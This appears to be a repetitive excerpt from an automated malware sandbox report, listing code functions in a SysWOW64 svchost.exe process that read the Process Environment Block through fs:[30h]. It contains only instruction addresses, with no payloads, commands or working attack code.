Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]	2_2_035B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]	2_2_035347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]	2_2_035527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_035BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]	2_2_035D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]	2_2_035307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E47A0 mov eax, dword ptr fs:[00000030h]	2_2_035E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]	2_2_0354C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]	2_2_03562674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]	2_2_035F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]	2_2_0356A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]	2_2_03572619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]	2_2_035AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]	2_2_0354260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]	2_2_0354E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]	2_2_03566620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]	2_2_03568620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]	2_2_0353262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0356A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_035AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]	2_2_035B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]	2_2_03534690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]	2_2_035666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0356C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]	2_2_03538550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]	2_2_0356656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]	2_2_035C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]	2_2_03604500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]	2_2_0355E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]	2_2_035365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0356A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]	2_2_0356E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0355E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]	2_2_035325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]	2_2_0356C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]	2_2_0356E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]	2_2_03532582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]	2_2_03564588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]	2_2_035545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]	2_2_035B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA456 mov eax, dword ptr fs:[00000030h]	2_2_035EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]	2_2_0352645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]	2_2_0355245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]	2_2_0356E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]	2_2_0355A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]	2_2_035BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]	2_2_03568402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]	2_2_0356A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]	2_2_0352E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]	2_2_0352C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]	2_2_035B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]	2_2_035304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA49A mov eax, dword ptr fs:[00000030h]	2_2_035EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]	2_2_035644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_035BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]	2_2_035364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528B50 mov eax, dword ptr fs:[00000030h]	2_2_03528B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEB50 mov eax, dword ptr fs:[00000030h]	2_2_035DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]	2_2_035E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]	2_2_035C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]	2_2_035D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]	2_2_0352CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]	2_2_03602B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]	2_2_035AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604B00 mov eax, dword ptr fs:[00000030h]	2_2_03604B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]	2_2_0355EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]	2_2_035F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_035DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]	2_2_03550BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]	2_2_03530BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]	2_2_03538BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]	2_2_0355EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_035BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]	2_2_03540BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_035E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]	2_2_03536A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]	2_2_03540A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]	2_2_035ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]	2_2_0356CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DEA60 mov eax, dword ptr fs:[00000030h]	2_2_035DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]	2_2_035BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]	2_2_03554A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]	2_2_0356CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]	2_2_0356CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]	2_2_0355EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]	2_2_03530AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]	2_2_03564AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]	2_2_03586ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]	2_2_0356AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]	2_2_03568A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]	2_2_03604A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]	2_2_03538AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]	2_2_03586AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]	2_2_035B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604940 mov eax, dword ptr fs:[00000030h]	2_2_03604940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]	2_2_035D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]	2_2_035BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]	2_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]	2_2_0357096E
